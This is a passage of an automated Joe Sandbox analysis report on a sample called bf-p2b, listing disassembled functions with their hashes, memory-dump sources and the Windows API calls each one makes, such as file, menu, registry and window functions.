                          • Opcode ID: 2c4b28869c6d5331250837f8f84787f7d5d072c046878161ac754c18192036d0
                          • Instruction ID: 03a735c7db4173c188a57ec9319b44ae9a9352e8c18bfc0df76d6ef331744a63
                          • Opcode Fuzzy Hash: 2c4b28869c6d5331250837f8f84787f7d5d072c046878161ac754c18192036d0
                          • Instruction Fuzzy Hash: CA311E31644214EFEB20DF58EC84FA537E5FB4A724F1942A9F5059B2B2CF76A840DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B031B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00B031DA
                          • lstrcmpiW.KERNEL32(?,?), ref: 00B46A2B
                          • _wcscmp.LIBCMT ref: 00B46A49
                          • MoveFileW.KERNEL32(?,?), ref: 00B46A62
                            • Part of subcall function 00B46D6D: GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00B46DBA
                            • Part of subcall function 00B46D6D: GetLastError.KERNEL32 ref: 00B46DC5
                            • Part of subcall function 00B46D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00B46DD9
                          • _wcscat.LIBCMT ref: 00B46AA4
                          • SHFileOperationW.SHELL32(?), ref: 00B46B0C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: File$AttributesCreateDirectoryErrorFullLastMoveNameOperationPath_wcscat_wcscmplstrcmpi
                          • String ID: \*.*
                          • API String ID: 2323102230-1173974218
                          • Opcode ID: 5249af6d56911cf0065495214e6b4909816f5ab625a3cef83e79e4ee01d22abb
                          • Instruction ID: 9d2458900f6e9c5b5de041a026bf2eff0bed7df162f2ad6ab15dd19bde011832
                          • Opcode Fuzzy Hash: 5249af6d56911cf0065495214e6b4909816f5ab625a3cef83e79e4ee01d22abb
                          • Instruction Fuzzy Hash: F53141B1900218AACF60EFA4E845BDDB7F8AF19300F5055EAE509E3151EB309B89CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B1C657
                            • Part of subcall function 00B1C619: GetStockObject.GDI32(00000011), ref: 00B1C66B
                            • Part of subcall function 00B1C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1C675
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B6A13B
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B6A148
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B6A153
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B6A162
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B6A16E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: 2516bf6ca2c1e3f1233a8bacdf4419f548ee3068900a71858028d14df6073d8e
                          • Instruction ID: 26207994e8278cce0f51200479e27549161e6e3caaea26730b8b7fca1d8cbad7
                          • Opcode Fuzzy Hash: 2516bf6ca2c1e3f1233a8bacdf4419f548ee3068900a71858028d14df6073d8e
                          • Instruction Fuzzy Hash: D61182B115021DBEEF115F65CC86EE7BF9DEF09798F014215FA08A70A1CA769C21DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __getptd_noexit.LIBCMT ref: 00B24C3E
                            • Part of subcall function 00B286B5: GetLastError.KERNEL32(?,00B20127,00B288A3,00B24673,?,?,00B20127,?,00B0125D,00000058,?,?), ref: 00B286B7
                            • Part of subcall function 00B286B5: __calloc_crt.LIBCMT ref: 00B286D8
                            • Part of subcall function 00B286B5: GetCurrentThreadId.KERNEL32 ref: 00B28701
                            • Part of subcall function 00B286B5: SetLastError.KERNEL32(00000000,00B20127,00B288A3,00B24673,?,?,00B20127,?,00B0125D,00000058,?,?), ref: 00B28719
                          • CloseHandle.KERNEL32(?,?,00B24C1D), ref: 00B24C52
                          • __freeptd.LIBCMT ref: 00B24C59
                          • RtlExitUserThread.NTDLL(00000000,?,00B24C1D), ref: 00B24C61
                          • GetLastError.KERNEL32(?,?,00B24C1D), ref: 00B24C91
                          • RtlExitUserThread.NTDLL(00000000,?,?,00B24C1D), ref: 00B24C98
                          • __freefls@4.LIBCMT ref: 00B24CB4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLastThread$ExitUser$CloseCurrentHandle__calloc_crt__freefls@4__freeptd__getptd_noexit
                          • String ID:
                          • API String ID: 1445074172-0
                          • Opcode ID: 1fb8f47184db0b6ba5bbda922b26c010e316755707146cf785353efd42b79b4c
                          • Instruction ID: 7972e013f548b3a6fd5808f9716d09346e6df38673f28f62555e804562213e1c
                          • Opcode Fuzzy Hash: 1fb8f47184db0b6ba5bbda922b26c010e316755707146cf785353efd42b79b4c
                          • Instruction Fuzzy Hash: B201DF70802721AFC719BBB8F90990D7BE5EF183157108599F50D9B6A2EF35D842CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetClientRect.USER32(?,?), ref: 00B1C6C0
                          • GetWindowRect.USER32(?,?), ref: 00B1C701
                          • ScreenToClient.USER32(?,000000FF), ref: 00B1C729
                          • GetClientRect.USER32(?,?), ref: 00B1C856
                          • GetWindowRect.USER32(?,?), ref: 00B1C86F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: fa85a6cb5455a0561dc390969059d5ae36941b11e2c85047eddc1da7cd20fb02
                          • Instruction ID: e82f4e56a2c7d80a12d1b9b3953900108392b661bfc133065de2fb48af8874f3
                          • Opcode Fuzzy Hash: fa85a6cb5455a0561dc390969059d5ae36941b11e2c85047eddc1da7cd20fb02
                          • Instruction Fuzzy Hash: 15B12A79900249DBDB10CFA8C5807EDBBF1FF08310F5495AAEC69AB654DB70A980CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove$__itow__swprintf
                          • String ID:
                          • API String ID: 3253778849-0
                          • Opcode ID: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                          • Instruction ID: 6ea2ce18995637ab0a8fa219ceb8aee217e8c2c40de726cd0e40a3062ab51239
                          • Opcode Fuzzy Hash: 3cd69ee615229ba2ecfd3414ae9f88e9e9d68840e897ffa2ecb1c29f758a9b95
                          • Instruction Fuzzy Hash: EE61AA3051025AABDB01EF60CC82EFE7BE9AF04304F4545D9F85A6B2D2EB34AE05DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00B61B09
                          • Process32FirstW.KERNEL32(00000000,?), ref: 00B61B17
                          • __wsplitpath.LIBCMT ref: 00B61B45
                            • Part of subcall function 00B2297D: __wsplitpath_helper.LIBCMT ref: 00B229BD
                          • _wcscat.LIBCMT ref: 00B61B5A
                          • Process32NextW.KERNEL32(00000000,?), ref: 00B61BD0
                          • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00B61BE2
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                          • String ID:
                          • API String ID: 1380811348-0
                          • Opcode ID: b5bca3e55bcf5fcf403e2f0580c6ecafd65209446fd3182f6747d6ef16a66ea2
                          • Instruction ID: f168a9d52238eabc1a05a1fe7e51c5f674870f9111507a4ceadcf7221d003ed2
                          • Opcode Fuzzy Hash: b5bca3e55bcf5fcf403e2f0580c6ecafd65209446fd3182f6747d6ef16a66ea2
                          • Instruction Fuzzy Hash: 5C5180715043009FD720EF24D885EABBBE8EF88754F04495EF586D7291EB70EA44CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscpy$_wcscat
                          • String ID:
                          • API String ID: 2037614760-0
                          • Opcode ID: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                          • Instruction ID: ba27fd5459b5d7c7d00394c41ba10cde80d3f6f62c79d79b1fc62db2b4179647
                          • Opcode Fuzzy Hash: f1f98a6ec25caa01f90f5d415b32dc8c6c5e2b15692a0a50f5ac00c05728c96b
                          • Instruction Fuzzy Hash: 4151E431A04225AACB11AF98D4819FEB7F1EF14710FA088DAF581AB291DB745FD2D7D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B63AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B62AA6,?,?), ref: 00B63B0E
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B62FA0
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B62FE0
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B63003
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B6302C
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B6306F
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B6307C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                          • String ID:
                          • API String ID: 4046560759-0
                          • Opcode ID: 8bd2dc6a9c4041774b1ce0e6d6a168044c0988c2394db2e49e8b0a2fcb1f73d2
                          • Instruction ID: a1aa76eb0fec68a7a774d67aa1d3cdef6c27aeb40f66f7499b99ac58a8e39c30
                          • Opcode Fuzzy Hash: 8bd2dc6a9c4041774b1ce0e6d6a168044c0988c2394db2e49e8b0a2fcb1f73d2
                          • Instruction Fuzzy Hash: 00515631208200AFD715EF64C891E6BBBF9FF88704F04499EF585872A1DB75EA09CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00B42AF6
                          • VariantClear.OLEAUT32(00000013), ref: 00B42B68
                          • VariantClear.OLEAUT32(00000000), ref: 00B42BC3
                          • _memmove.LIBCMT ref: 00B42BED
                          • VariantClear.OLEAUT32(?), ref: 00B42C3A
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B42C68
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType_memmove
                          • String ID:
                          • API String ID: 1101466143-0
                          • Opcode ID: bb744df11879cb9b169d90601e38883dbb02817bc9f6d5019438f1d56b98b359
                          • Instruction ID: 96f7a91ba31be9d41e338d554ae3537cb80e208d1d3ee6240a837a175c8df9cd
                          • Opcode Fuzzy Hash: bb744df11879cb9b169d90601e38883dbb02817bc9f6d5019438f1d56b98b359
                          • Instruction Fuzzy Hash: 1E5147B5A00209EFDB14CF58C880AAAB7F8FF4C314B158599F959DB351E730EA51DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetMenu.USER32(?), ref: 00B6833D
                          • GetMenuItemCount.USER32(00000000), ref: 00B68374
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B6839C
                          • GetMenuItemID.USER32(?,?), ref: 00B6840B
                          • GetSubMenu.USER32(?,?), ref: 00B68419
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00B6846A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$Item$CountMessagePostString
                          • String ID:
                          • API String ID: 650687236-0
                          • Opcode ID: c00fd3e1e045d0683a15ae6742139f59d02c68d6ae20280fbb88dfc01b693bbc
                          • Instruction ID: e1c435724ab18bde72383a75cb8dd284c19c9836d57d6f0d77e21c41c74637fd
                          • Opcode Fuzzy Hash: c00fd3e1e045d0683a15ae6742139f59d02c68d6ae20280fbb88dfc01b693bbc
                          • Instruction Fuzzy Hash: 49519C71A00219EFCB11EFA4C881AAEBBF4EF48710F144599F915BB391DF34AE418B94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B4552E
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B45579
                          • IsMenu.USER32(00000000), ref: 00B45599
                          • CreatePopupMenu.USER32 ref: 00B455CD
                          • GetMenuItemCount.USER32(000000FF), ref: 00B4562B
                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B4565C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                          • String ID:
                          • API String ID: 3311875123-0
                          • Opcode ID: 2945675523d7a7f12747ad949eff8b9a5673a8b70504b4ec880744b75046985e
                          • Instruction ID: bc50bae6c0083faec57eee0dedf4fc55da9350d5bbd787170c3e05b801f786fd
                          • Opcode Fuzzy Hash: 2945675523d7a7f12747ad949eff8b9a5673a8b70504b4ec880744b75046985e
                          • Instruction Fuzzy Hash: 3451CF70600E09EFDF30CF68D888BADBBF9EF15318F5041A9E8559B292D7709A44DB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 00B1B1C1
                          • GetWindowRect.USER32(?,?), ref: 00B1B225
                          • ScreenToClient.USER32(?,?), ref: 00B1B242
                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B1B253
                          • EndPaint.USER32(?,?), ref: 00B1B29D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                          • String ID:
                          • API String ID: 1827037458-0
                          • Opcode ID: 435956365300bf93fa79b89616da2774a5433be8955eee9d4a8d73aa9de147bc
                          • Instruction ID: 09bf2a8d48a7a775703dc64d0d7bf8e9a017720a6fa45bdb8ce676b975991072
                          • Opcode Fuzzy Hash: 435956365300bf93fa79b89616da2774a5433be8955eee9d4a8d73aa9de147bc
                          • Instruction Fuzzy Hash: 614192711042019FC711DF28DCC4FBA7BE8EF5A320F1406A9F9A5972E2CB319885DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ShowWindow.USER32(00BC1810,00000000,?,?,00BC1810,00BC1810,?,00B7E2D6), ref: 00B6E21B
                          • EnableWindow.USER32(?,00000000), ref: 00B6E23F
                          • ShowWindow.USER32(00BC1810,00000000,?,?,00BC1810,00BC1810,?,00B7E2D6), ref: 00B6E29F
                          • ShowWindow.USER32(?,00000004,?,?,00BC1810,00BC1810,?,00B7E2D6), ref: 00B6E2B1
                          • EnableWindow.USER32(?,00000001), ref: 00B6E2D5
                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B6E2F8
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Show$Enable$MessageSend
                          • String ID:
                          • API String ID: 642888154-0
                          • Opcode ID: 93c5599f6fd89b96bae52a2a10719267ab6a12df8c6660af959eae57e71d6e0b
                          • Instruction ID: 9e94502363773f329d3eb80563b55eb948e573ce8dfed3d46ba1b38bef6fa13e
                          • Opcode Fuzzy Hash: 93c5599f6fd89b96bae52a2a10719267ab6a12df8c6660af959eae57e71d6e0b
                          • Instruction Fuzzy Hash: F5414F39601145EFDB26CF14C4A9B947BE6FB0A314F1841F9EA688F2A2C735E845CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B41734
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B4175A
                          • SysAllocString.OLEAUT32(00000000), ref: 00B4175D
                          • SysAllocString.OLEAUT32(?), ref: 00B4177B
                          • SysFreeString.OLEAUT32(?), ref: 00B41784
                          • SysAllocString.OLEAUT32(?), ref: 00B417B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$Free
                          • String ID:
                          • API String ID: 1313759350-0
                          • Opcode ID: c1864980d44f75bbd47083defe1bd376dd753c47867ea63ad0050a4ec0cfa326
                          • Instruction ID: 9123fdaba6c9ee1fcb5fe6a5639f1788ba900ac3cac1601aa9202d5ed752754d
                          • Opcode Fuzzy Hash: c1864980d44f75bbd47083defe1bd376dd753c47867ea63ad0050a4ec0cfa326
                          • Instruction Fuzzy Hash: 9821A775A00219AF9B10AFACCC88CBF73ECEB093747448566F905DB2A1DB70ED819760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
